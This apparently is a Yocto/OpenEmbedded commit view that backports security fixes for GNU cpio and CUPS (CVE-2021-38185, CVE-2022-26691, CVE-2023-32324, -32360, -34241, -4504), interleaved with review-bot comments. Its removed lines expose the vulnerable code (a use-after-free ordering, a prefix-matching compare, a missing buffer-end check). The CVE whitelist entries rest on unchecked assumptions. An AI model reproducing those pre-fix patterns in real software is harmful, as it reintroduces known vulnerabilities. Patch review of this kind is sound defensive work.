250 | #endif | ||
251 | - | ||
252 | #include <stdio.h> | ||
253 | +#include <stdlib.h> | ||
254 | #if defined(HAVE_STRING_H) || defined(STDC_HEADERS) | ||
255 | #include <string.h> | ||
256 | #else | ||
257 | @@ -33,24 +33,41 @@ | ||
258 | /* Initialiaze dynamic string STRING with space for SIZE characters. */ | ||
259 | |||
260 | void | ||
261 | -ds_init (dynamic_string *string, int size) | ||
262 | +ds_init (dynamic_string *string) | ||
263 | +{ | ||
264 | + memset (string, 0, sizeof *string); | ||
265 | +} | ||
266 | + | ||
267 | +/* Free the dynamic string storage. */ | ||
268 | + | ||
269 | +void | ||
270 | +ds_free (dynamic_string *string) | ||
271 | { | ||
272 | - string->ds_length = size; | ||
273 | - string->ds_string = (char *) xmalloc (size); | ||
274 | + free (string->ds_string); | ||
275 | } | ||
276 | |||
277 | -/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */ | ||
278 | +/* Expand dynamic string STRING, if necessary. */ | ||
279 | |||
280 | void | ||
281 | -ds_resize (dynamic_string *string, int size) | ||
282 | +ds_resize (dynamic_string *string) | ||
283 | { | ||
284 | - if (size > string->ds_length) | ||
285 | + if (string->ds_idx == string->ds_size) | ||
286 | { | ||
287 | - string->ds_length = size; | ||
288 | - string->ds_string = (char *) xrealloc ((char *) string->ds_string, size); | ||
289 | + string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, | ||
290 | + 1); | ||
291 | } | ||
292 | } | ||
293 | |||
294 | +/* Reset the index of the dynamic string S to LEN. */ | ||
295 | + | ||
296 | +void | ||
297 | +ds_reset (dynamic_string *s, size_t len) | ||
298 | +{ | ||
299 | + while (len > s->ds_size) | ||
300 | + ds_resize (s); | ||
301 | + s->ds_idx = len; | ||
302 | +} | ||
303 | + | ||
304 | /* Dynamic string S gets a string terminated by the EOS character | ||
305 | (which is removed) from file F. S will increase | ||
306 | in size during the function if the string from F is longer than | ||
307 | @@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size) | ||
308 | char * | ||
309 | ds_fgetstr (FILE *f, dynamic_string *s, char eos) | ||
310 | { | ||
311 | - int insize; /* Amount needed for line. */ | ||
312 | - int strsize; /* Amount allocated for S. */ | ||
313 | int next_ch; | ||
314 | |||
315 | /* Initialize. */ | ||
316 | - insize = 0; | ||
317 | - strsize = s->ds_length; | ||
318 | + s->ds_idx = 0; | ||
319 | |||
320 | /* Read the input string. */ | ||
321 | - next_ch = getc (f); | ||
322 | - while (next_ch != eos && next_ch != EOF) | ||
323 | + while ((next_ch = getc (f)) != eos && next_ch != EOF) | ||
324 | { | ||
325 | - if (insize >= strsize - 1) | ||
326 | - { | ||
327 | - ds_resize (s, strsize * 2 + 2); | ||
328 | - strsize = s->ds_length; | ||
329 | - } | ||
330 | - s->ds_string[insize++] = next_ch; | ||
331 | - next_ch = getc (f); | ||
332 | + ds_resize (s); | ||
333 | + s->ds_string[s->ds_idx++] = next_ch; | ||
334 | } | ||
335 | - s->ds_string[insize++] = '\0'; | ||
336 | + ds_resize (s); | ||
337 | + s->ds_string[s->ds_idx] = '\0'; | ||
338 | |||
339 | - if (insize == 1 && next_ch == EOF) | ||
340 | + if (s->ds_idx == 0 && next_ch == EOF) | ||
341 | return NULL; | ||
342 | else | ||
343 | return s->ds_string; | ||
344 | } | ||
345 | |||
346 | +void | ||
347 | +ds_append (dynamic_string *s, int c) | ||
348 | +{ | ||
349 | + ds_resize (s); | ||
350 | + s->ds_string[s->ds_idx] = c; | ||
351 | + if (c) | ||
352 | + { | ||
353 | + s->ds_idx++; | ||
354 | + ds_resize (s); | ||
355 | + s->ds_string[s->ds_idx] = 0; | ||
356 | + } | ||
357 | +} | ||
358 | + | ||
359 | +void | ||
360 | +ds_concat (dynamic_string *s, char const *str) | ||
361 | +{ | ||
362 | + size_t len = strlen (str); | ||
363 | + while (len + 1 > s->ds_size) | ||
364 | + ds_resize (s); | ||
365 | + memcpy (s->ds_string + s->ds_idx, str, len); | ||
366 | + s->ds_idx += len; | ||
367 | + s->ds_string[s->ds_idx] = 0; | ||
368 | +} | ||
369 | + | ||
370 | char * | ||
371 | ds_fgets (FILE *f, dynamic_string *s) | ||
372 | { | ||
373 | @@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s) | ||
374 | { | ||
375 | return ds_fgetstr (f, s, '\0'); | ||
376 | } | ||
377 | + | ||
378 | +/* Return true if the dynamic string S ends with character C. */ | ||
379 | +int | ||
380 | +ds_endswith (dynamic_string *s, int c) | ||
381 | +{ | ||
382 | + return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c); | ||
383 | +} | ||
384 | diff --git a/src/dstring.h b/src/dstring.h | ||
385 | index b5135fe..f5b04ef 100644 | ||
386 | --- a/src/dstring.h | ||
387 | +++ b/src/dstring.h | ||
388 | @@ -17,10 +17,6 @@ | ||
389 | Software Foundation, Inc., 51 Franklin Street, Fifth Floor, | ||
390 | Boston, MA 02110-1301 USA. */ | ||
391 | |||
392 | -#ifndef NULL | ||
393 | -#define NULL 0 | ||
394 | -#endif | ||
395 | - | ||
396 | /* A dynamic string consists of record that records the size of an | ||
397 | allocated string and the pointer to that string. The actual string | ||
398 | is a normal zero byte terminated string that can be used with the | ||
399 | @@ -30,22 +26,25 @@ | ||
400 | |||
401 | typedef struct | ||
402 | { | ||
403 | - int ds_length; /* Actual amount of storage allocated. */ | ||
404 | - char *ds_string; /* String. */ | ||
405 | + size_t ds_size; /* Actual amount of storage allocated. */ | ||
406 | + size_t ds_idx; /* Index of the next free byte in the string. */ | ||
407 | + char *ds_string; /* String storage. */ | ||
408 | } dynamic_string; | ||
409 | |||
410 | +#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL } | ||
411 | |||
412 | -/* Macros that look similar to the original string functions. | ||
413 | - WARNING: These macros work only on pointers to dynamic string records. | ||
414 | - If used with a real record, an "&" must be used to get the pointer. */ | ||
415 | -#define ds_strlen(s) strlen ((s)->ds_string) | ||
416 | -#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string) | ||
417 | -#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n) | ||
418 | -#define ds_index(s, c) index ((s)->ds_string, c) | ||
419 | -#define ds_rindex(s, c) rindex ((s)->ds_string, c) | ||
420 | +void ds_init (dynamic_string *string); | ||
421 | +void ds_free (dynamic_string *string); | ||
422 | +void ds_reset (dynamic_string *s, size_t len); | ||
423 | |||
424 | -void ds_init (dynamic_string *string, int size); | ||
425 | -void ds_resize (dynamic_string *string, int size); | ||
426 | +/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */ | ||
427 | char *ds_fgetname (FILE *f, dynamic_string *s); | ||
428 | char *ds_fgets (FILE *f, dynamic_string *s); | ||
429 | char *ds_fgetstr (FILE *f, dynamic_string *s, char eos); | ||
430 | +void ds_append (dynamic_string *s, int c); | ||
431 | +void ds_concat (dynamic_string *s, char const *str); | ||
432 | + | ||
433 | +#define ds_len(s) ((s)->ds_idx) | ||
434 | + | ||
435 | +int ds_endswith (dynamic_string *s, int c); | ||
436 | + | ||
437 | diff --git a/src/util.c b/src/util.c | ||
438 | index 4421b20..6d6bbaa 100644 | ||
439 | --- a/src/util.c | ||
440 | +++ b/src/util.c | ||
441 | @@ -846,11 +846,9 @@ get_next_reel (int tape_des) | ||
442 | FILE *tty_out; /* File for interacting with user. */ | ||
443 | int old_tape_des; | ||
444 | char *next_archive_name; | ||
445 | - dynamic_string new_name; | ||
446 | + dynamic_string new_name = DYNAMIC_STRING_INITIALIZER; | ||
447 | char *str_res; | ||
448 | |||
449 | - ds_init (&new_name, 128); | ||
450 | - | ||
451 | /* Open files for interactive communication. */ | ||
452 | tty_in = fopen (TTY_NAME, "r"); | ||
453 | if (tty_in == NULL) | ||
454 | @@ -925,7 +923,7 @@ get_next_reel (int tape_des) | ||
455 | error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"), | ||
456 | old_tape_des, tape_des); | ||
457 | |||
458 | - free (new_name.ds_string); | ||
459 | + ds_free (&new_name); | ||
460 | fclose (tty_in); | ||
461 | fclose (tty_out); | ||
462 | } | ||
463 | -- | ||
464 | 2.25.1 | ||
465 | |||
466 | |||
467 | From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001 | ||
468 | From: Sergey Poznyakoff <gray@gnu.org> | ||
469 | Date: Wed, 11 Aug 2021 18:10:38 +0300 | ||
470 | Subject: [PATCH 2/3] Fix previous commit | ||
471 | |||
472 | * src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a | ||
473 | loop. | ||
474 | --- | ||
475 | src/dstring.c | 4 ++-- | ||
476 | 1 file changed, 2 insertions(+), 2 deletions(-) | ||
477 | |||
478 | diff --git a/src/dstring.c b/src/dstring.c | ||
479 | index 358f356..90c691c 100644 | ||
480 | --- a/src/dstring.c | ||
481 | +++ b/src/dstring.c | ||
482 | @@ -64,7 +64,7 @@ void | ||
483 | ds_reset (dynamic_string *s, size_t len) | ||
484 | { | ||
485 | while (len > s->ds_size) | ||
486 | - ds_resize (s); | ||
487 | + s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); | ||
488 | s->ds_idx = len; | ||
489 | } | ||
490 | |||
491 | @@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str) | ||
492 | { | ||
493 | size_t len = strlen (str); | ||
494 | while (len + 1 > s->ds_size) | ||
495 | - ds_resize (s); | ||
496 | + s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); | ||
497 | memcpy (s->ds_string + s->ds_idx, str, len); | ||
498 | s->ds_idx += len; | ||
499 | s->ds_string[s->ds_idx] = 0; | ||
500 | -- | ||
501 | 2.25.1 | ||
502 | |||
503 | |||
504 | From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001 | ||
505 | From: Sergey Poznyakoff <gray@gnu.org> | ||
506 | Date: Wed, 18 Aug 2021 09:41:39 +0300 | ||
507 | Subject: [PATCH 3/3] Fix dynamic string reallocations | ||
508 | |||
509 | * src/dstring.c (ds_resize): Take additional argument: number of | ||
510 | bytes to leave available after ds_idx. All uses changed. | ||
511 | --- | ||
512 | src/dstring.c | 18 ++++++++---------- | ||
513 | 1 file changed, 8 insertions(+), 10 deletions(-) | ||
514 | |||
515 | diff --git a/src/dstring.c b/src/dstring.c | ||
516 | index 90c691c..0f597cc 100644 | ||
517 | --- a/src/dstring.c | ||
518 | +++ b/src/dstring.c | ||
519 | @@ -49,9 +49,9 @@ ds_free (dynamic_string *string) | ||
520 | /* Expand dynamic string STRING, if necessary. */ | ||
521 | |||
522 | void | ||
523 | -ds_resize (dynamic_string *string) | ||
524 | +ds_resize (dynamic_string *string, size_t len) | ||
525 | { | ||
526 | - if (string->ds_idx == string->ds_size) | ||
527 | + while (len + string->ds_idx >= string->ds_size) | ||
528 | { | ||
529 | string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, | ||
530 | 1); | ||
531 | @@ -63,8 +63,7 @@ ds_resize (dynamic_string *string) | ||
532 | void | ||
533 | ds_reset (dynamic_string *s, size_t len) | ||
534 | { | ||
535 | - while (len > s->ds_size) | ||
536 | - s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); | ||
537 | + ds_resize (s, len); | ||
538 | s->ds_idx = len; | ||
539 | } | ||
540 | |||
541 | @@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) | ||
542 | /* Read the input string. */ | ||
543 | while ((next_ch = getc (f)) != eos && next_ch != EOF) | ||
544 | { | ||
545 | - ds_resize (s); | ||
546 | + ds_resize (s, 0); | ||
547 | s->ds_string[s->ds_idx++] = next_ch; | ||
548 | } | ||
549 | - ds_resize (s); | ||
550 | + ds_resize (s, 0); | ||
551 | s->ds_string[s->ds_idx] = '\0'; | ||
552 | |||
553 | if (s->ds_idx == 0 && next_ch == EOF) | ||
554 | @@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) | ||
555 | void | ||
556 | ds_append (dynamic_string *s, int c) | ||
557 | { | ||
558 | - ds_resize (s); | ||
559 | + ds_resize (s, 0); | ||
560 | s->ds_string[s->ds_idx] = c; | ||
561 | if (c) | ||
562 | { | ||
563 | s->ds_idx++; | ||
564 | - ds_resize (s); | ||
565 | + ds_resize (s, 0); | ||
566 | s->ds_string[s->ds_idx] = 0; | ||
567 | } | ||
568 | } | ||
569 | @@ -115,8 +114,7 @@ void | ||
570 | ds_concat (dynamic_string *s, char const *str) | ||
571 | { | ||
572 | size_t len = strlen (str); | ||
573 | - while (len + 1 > s->ds_size) | ||
574 | - s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); | ||
575 | + ds_resize (s, len); | ||
576 | memcpy (s->ds_string + s->ds_idx, str, len); | ||
577 | s->ds_idx += len; | ||
578 | s->ds_string[s->ds_idx] = 0; | ||
579 | -- | ||
580 | 2.25.1 | ||
581 | |||
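--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
 SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
 file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
 file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
+file://CVE-2021-38185.patch \
+file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \
+file://0004-Fix-appending-to-archives-bigger-than-2G.patch \
 "
 
 SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
@@ -16,6 +19,9 @@ SRC_URI[sha256sum] = "e87470d9c984317f658567c03bfefb6b0c829ff17dbf6b0de48d71a4c8
 
 inherit autotools gettext texinfo
 
+# Issue applies to use of cpio in SUSE/OBS, doesn't apply to us
+CVE_CHECK_WHITELIST += "CVE-2010-4226"
+
 EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}"
 
 do_install () {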
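--- a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
+++ b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Password strength checker library"
-HOMEPAGE = "http://sourceforge.net/projects/cracklib"
+HOMEPAGE = "https://github.com/cracklib/cracklib"
+DESCRIPTION = "${SUMMARY}"
 
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06"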
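--- a/meta/recipes-extended/cups/cups.inc
+++ b/meta/recipes-extended/cups/cups.inc
@@ -13,6 +13,11 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t
 file://0002-don-t-try-to-run-generated-binaries.patch \
 file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \
 file://0004-cups-fix-multilib-install-file-conflicts.patch\
+file://CVE-2022-26691.patch \
+file://CVE-2023-32324.patch \
+file://CVE-2023-34241.patch \
+file://CVE-2023-32360.patch \
+file://CVE-2023-4504.patch \
 "
 
 UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases"
@@ -41,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi',
 PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi"
 PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl"
 PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam"
-PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd"
+PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd"
 PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd"
 
 EXTRA_OECONF = " \
@@ -52,6 +57,9 @@ EXTRA_OECONF = " \
 --enable-debug \
 --disable-relro \
 --enable-libusb \
+--with-system-groups=lpadmin \
+--with-cups-group=lp \
+--with-domainsocket=/run/cups/cups.sock \
 DSOFLAGS='${LDFLAGS}' \
 "
 
@@ -113,3 +121,7 @@ SYSROOT_PREPROCESS_FUNCS += "cups_sysroot_preprocess"
 cups_sysroot_preprocess () {
 sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:'
 }
+
+# -25317 concerns /var/log/cups having lp ownership. Our /var/log/cups is
+# root:root, so this doesn't apply.
+CVE_CHECK_WHITELIST += "CVE-2021-25317"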
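Review bot: The `CVE_CHECK_WHITELIST` entry for CVE-2021-25317 in the last hunk rests on /var/log/cups being root:root, but nothing in this file section sets or checks that ownership, and the same change adds `--with-cups-group=lp` to `EXTRA_OECONF`. The exclusion is only as good as the install step that creates the directory, which is outside these hunks. I would make the dependency explicit in the comment, e.g. `# Re-check this exclusion if the install step changes the owner or mode of /var/log/cups.`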
diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch new file mode 100644 index 0000000000..1fa5a54c70 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch | |||
@@ -0,0 +1,33 @@ | |||
1 | From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001 | ||
2 | From: Zdenek Dohnal <zdohnal@redhat.com> | ||
3 | Date: Thu, 26 May 2022 06:27:04 +0200 | ||
4 | Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes | ||
5 | CVE-2022-26691) | ||
6 | |||
7 | The previous algorithm didn't expect the strings can have a different | ||
8 | length, so one string can be a substring of the other and such substring | ||
9 | was reported as equal to the longer string. | ||
10 | |||
11 | CVE: CVE-2022-26691 | ||
12 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444] | ||
13 | Signed-off-by: Steve Sakoman | ||
14 | |||
15 | --- | ||
16 | diff --git a/scheduler/cert.c b/scheduler/cert.c | ||
17 | index b268bf1b2..9b65b96c9 100644 | ||
18 | --- a/scheduler/cert.c | ||
19 | +++ b/scheduler/cert.c | ||
20 | @@ -434,5 +434,12 @@ ctcompare(const char *a, /* I - First string */ | ||
21 | b ++; | ||
22 | } | ||
23 | |||
24 | - return (result); | ||
25 | + /* | ||
26 | + * The while loop finishes when *a == '\0' or *b == '\0' | ||
27 | + * so after the while loop either both *a and *b == '\0', | ||
28 | + * or one points inside a string, so when we apply logical OR on *a, | ||
29 | + * *b and result, we get a non-zero return value if the compared strings don't match. | ||
30 | + */ | ||
31 | + | ||
32 | + return (result | *a | *b); | ||
33 | } | ||
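Review bot: The comment added in `ctcompare` explains why `*a` and `*b` are OR-ed into the result, but it does not say that the loop still ends at the terminator of the shorter string, so the running time follows that length even though the function name suggests a constant-time compare. One more line in the comment would stop readers assuming more than the function gives, e.g. `* Note: the loop runs for the length of the shorter string.` The loop body and the function header are outside the hunk, so this is read from the added comment and the two context lines only.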
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch new file mode 100644 index 0000000000..40b89c9899 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch | |||
@@ -0,0 +1,36 @@ | |||
1 | From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001 | ||
2 | From: Zdenek Dohnal <zdohnal@redhat.com> | ||
3 | Date: Thu, 1 Jun 2023 12:04:00 +0200 | ||
4 | Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324) | ||
5 | |||
6 | CVE: CVE-2023-32324 | ||
7 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589] | ||
8 | |||
9 | (cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e) | ||
10 | Signed-off-by: Sanjay Chitroda <schitrod@cisco.com> | ||
11 | --- | ||
12 | cups/string.c | 4 ++++ | ||
13 | 1 file changed, 4 insertions(+) | ||
14 | |||
15 | diff --git a/cups/string.c b/cups/string.c | ||
16 | index 93cdad19..6ef58515 100644 | ||
17 | --- a/cups/string.c | ||
18 | +++ b/cups/string.c | ||
19 | @@ -1,6 +1,7 @@ | ||
20 | /* | ||
21 | * String functions for CUPS. | ||
22 | * | ||
23 | + * Copyright © 2023 by OpenPrinting. | ||
24 | * Copyright © 2007-2019 by Apple Inc. | ||
25 | * Copyright © 1997-2007 by Easy Software Products. | ||
26 | * | ||
27 | @@ -730,6 +731,9 @@ _cups_strlcpy(char *dst, /* O - Destination string */ | ||
28 | size_t srclen; /* Length of source string */ | ||
29 | |||
30 | |||
31 | + if (size == 0) | ||
32 | + return (0); | ||
33 | + | ||
34 | /* | ||
35 | * Figure out how much room is needed... | ||
36 | */ | ||
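Review bot: The early `return (0);` for `size == 0` in `_cups_strlcpy` differs from the usual strlcpy convention of returning the source length, so a caller that uses the return value to detect truncation or to size a buffer sees 0 on this path. The rest of the function is outside the hunk, so I cannot confirm what the normal return value is; if it is the source length, the guard deserves a comment marking the zero-size case as the exception, e.g. `/* size == 0: nothing can be written, not even the terminator; returns 0, not strlen(src). */`.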
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch new file mode 100644 index 0000000000..4d39e1e57f --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch | |||
@@ -0,0 +1,31 @@ | |||
1 | From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001 | ||
2 | From: Michael R Sweet <michael.r.sweet@gmail.com> | ||
3 | Date: Tue, 6 Dec 2022 09:04:01 -0500 | ||
4 | Subject: [PATCH] Require authentication for CUPS-Get-Document. | ||
5 | |||
6 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913] | ||
7 | CVE: CVE-2023-32360 | ||
8 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
9 | --- | ||
10 | conf/cupsd.conf.in | 8 +++++++- | ||
11 | 1 file changed, 7 insertions(+), 1 deletion(-) | ||
12 | |||
13 | diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in | ||
14 | index b258849078..a07536f3e4 100644 | ||
15 | --- a/conf/cupsd.conf.in | ||
16 | +++ b/conf/cupsd.conf.in | ||
17 | @@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@ | ||
18 | Order deny,allow | ||
19 | </Limit> | ||
20 | |||
21 | - <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document> | ||
22 | + <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job> | ||
23 | + Require user @OWNER @SYSTEM | ||
24 | + Order deny,allow | ||
25 | + </Limit> | ||
26 | + | ||
27 | + <Limit CUPS-Get-Document> | ||
28 | + AuthType Default | ||
29 | Require user @OWNER @SYSTEM | ||
30 | Order deny,allow | ||
31 | </Limit> | ||
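Review bot: This fix changes only the `conf/cupsd.conf.in` template, so the new `<Limit CUPS-Get-Document>` block with `AuthType Default` reaches a device only when the installed cupsd.conf is regenerated from it. An image that keeps an existing cupsd.conf across upgrades, or a layer that ships its own, would still carry the old combined `<Limit>` line; whether either happens here is not visible in this section. The patch header should say so, e.g. `Note: only the default cupsd.conf template is changed; an existing or layer-provided cupsd.conf needs the same <Limit CUPS-Get-Document> block.`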
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch new file mode 100644 index 0000000000..816efc2946 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch | |||
@@ -0,0 +1,65 @@ | |||
1 | From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001 | ||
2 | From: Rose <83477269+AtariDreams@users.noreply.github.com> | ||
3 | Date: Thu, 1 Jun 2023 11:33:39 -0400 | ||
4 | Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection | ||
5 | |||
6 | httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to. | ||
7 | |||
8 | We have to log the hostname first. | ||
9 | |||
10 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2] | ||
11 | CVE: CVE-2023-34241 | ||
12 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
13 | --- | ||
14 | scheduler/client.c | 16 +++++++--------- | ||
15 | 1 file changed, 7 insertions(+), 9 deletions(-) | ||
16 | |||
17 | diff --git a/scheduler/client.c b/scheduler/client.c | ||
18 | index 91e441188c..327473a4d1 100644 | ||
19 | --- a/scheduler/client.c | ||
20 | +++ b/scheduler/client.c | ||
21 | @@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ | ||
22 | /* | ||
23 | * Can't have an unresolved IP address with double-lookups enabled... | ||
24 | */ | ||
25 | - | ||
26 | - httpClose(con->http); | ||
27 | - | ||
28 | cupsdLogClient(con, CUPSD_LOG_WARN, | ||
29 | - "Name lookup failed - connection from %s closed!", | ||
30 | + "Name lookup failed - closing connection from %s!", | ||
31 | httpGetHostname(con->http, NULL, 0)); | ||
32 | |||
33 | + httpClose(con->http); | ||
34 | free(con); | ||
35 | return; | ||
36 | } | ||
37 | @@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ | ||
38 | * with double-lookups enabled... | ||
39 | */ | ||
40 | |||
41 | - httpClose(con->http); | ||
42 | - | ||
43 | cupsdLogClient(con, CUPSD_LOG_WARN, | ||
44 | - "IP lookup failed - connection from %s closed!", | ||
45 | + "IP lookup failed - closing connection from %s!", | ||
46 | httpGetHostname(con->http, NULL, 0)); | ||
47 | + | ||
48 | + httpClose(con->http); | ||
49 | free(con); | ||
50 | return; | ||
51 | } | ||
52 | @@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ | ||
53 | |||
54 | if (!hosts_access(&wrap_req)) | ||
55 | { | ||
56 | - httpClose(con->http); | ||
57 | - | ||
58 | cupsdLogClient(con, CUPSD_LOG_WARN, | ||
59 | "Connection from %s refused by /etc/hosts.allow and " | ||
60 | "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0)); | ||
61 | + | ||
62 | + httpClose(con->http); | ||
63 | free(con); | ||
64 | return; | ||
65 | } | ||
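Review bot: In all three error paths of `cupsdAcceptClient` the fix is purely an ordering constraint, the `cupsdLogClient(...)` call that evaluates `httpGetHostname(con->http, NULL, 0)` must run before `httpClose(con->http)`, and nothing in the code records that, so a later tidy-up could swap them back. A short comment above each `httpClose` would pin it, e.g. `/* Log before closing: httpClose() frees con->http, which httpGetHostname() reads. */`. Separately, the `From` line names commit ffd290b4ab247f82722927ba9b21358daa16dbf1 while `Upstream-Status` points at 9809947a959e18409dcf562a3466ef246cb90cb2; a word on which one is the merged upstream commit would help traceability. The function starts and ends outside the hunks.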
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch new file mode 100644 index 0000000000..be0db1fbd4 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch | |||
@@ -0,0 +1,40 @@ | |||
1 | From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001 | ||
2 | From: Zdenek Dohnal <zdohnal@redhat.com> | ||
3 | Date: Fri, 1 Sep 2023 16:47:29 +0200 | ||
4 | Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504 | ||
5 | |||
6 | We didn't check for end of buffer if it looks there is an escaped | ||
7 | character - check for NULL terminator there and if found, return NULL | ||
8 | as return value and in `ptr`, because a lone backslash is not | ||
9 | a valid PostScript character. | ||
10 | |||
11 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31] | ||
12 | CVE: CVE-2023-4504 | ||
13 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
14 | --- | ||
15 | cups/raster-interpret.c | 14 +++++++++++++- | ||
16 | 1 file changed, 13 insertions(+), 1 deletion(-) | ||
17 | |||
18 | --- a/cups/raster-interpret.c | ||
19 | +++ b/cups/raster-interpret.c | ||
20 | @@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st, /* I - S | ||
21 | |||
22 | cur ++; | ||
23 | |||
24 | - if (*cur == 'b') | ||
25 | + /* | ||
26 | + * Return NULL if we reached NULL terminator, a lone backslash | ||
27 | + * is not a valid character in PostScript. | ||
28 | + */ | ||
29 | + | ||
30 | + if (!*cur) | ||
31 | + { | ||
32 | + *ptr = NULL; | ||
33 | + | ||
34 | + return (NULL); | ||
35 | + } | ||
36 | + | ||
37 | + if (*cur == 'b') | ||
38 | *valptr++ = '\b'; | ||
39 | else if (*cur == 'f') | ||
40 | *valptr++ = '\f'; | ||
